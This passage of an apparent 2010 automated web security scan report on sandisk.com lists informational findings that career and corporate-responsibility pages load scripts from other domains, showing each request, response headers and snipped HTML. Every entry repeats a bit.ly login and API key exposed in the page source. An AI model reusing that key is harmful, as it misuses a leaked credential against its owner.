Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40543
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.12. http://www.sandisk.com/about-sandisk/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/careers HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19631
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.13. http://www.sandisk.com/about-sandisk/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/careers/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19632
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.14. http://www.sandisk.com/about-sandisk/careers/benefits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/benefits

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/careers/benefits HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.15. http://www.sandisk.com/about-sandisk/careers/career-opportunities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/career-opportunities

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/careers/career-opportunities HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18318
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.16. http://www.sandisk.com/about-sandisk/careers/employment-practices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/employment-practices

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/careers/employment-practices HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19354
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.17. http://www.sandisk.com/about-sandisk/careers/for-new-college-grads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/for-new-college-grads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/careers/for-new-college-grads HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18058
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.18. http://www.sandisk.com/about-sandisk/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/contact-us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28653
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="contentRight">

   
       <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.19. http://www.sandisk.com/about-sandisk/corporate-social-responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41763
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.20. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41764
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.21. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41952
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.22. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41953
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.23. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-education  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/community-education

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/community-education HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41456
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.24. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15495
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.25. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41244
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.26. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/philanthropy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/philanthropy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39939
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.27. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/corporate-responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40552
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.28. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/corporate-responsibility/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40553
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.29. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39566
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
